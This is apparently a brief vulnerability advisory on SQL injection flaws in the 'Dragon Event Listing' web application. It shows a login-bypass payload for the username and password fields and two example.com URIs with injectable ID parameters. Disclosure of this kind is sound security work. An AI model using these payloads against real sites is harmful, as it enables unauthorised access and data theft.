Dragon Event Listing Multiple SQL Injection Vulnerabilities

Dragon Event Listing Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a web client.

The following example URIs are available:

username: 'or''='
passwd: 'or''='
http://www.example.com/event_searchdetail.asp?ID='[sql]
http://www.example.com/venue_detail.asp?VenueID='[sql]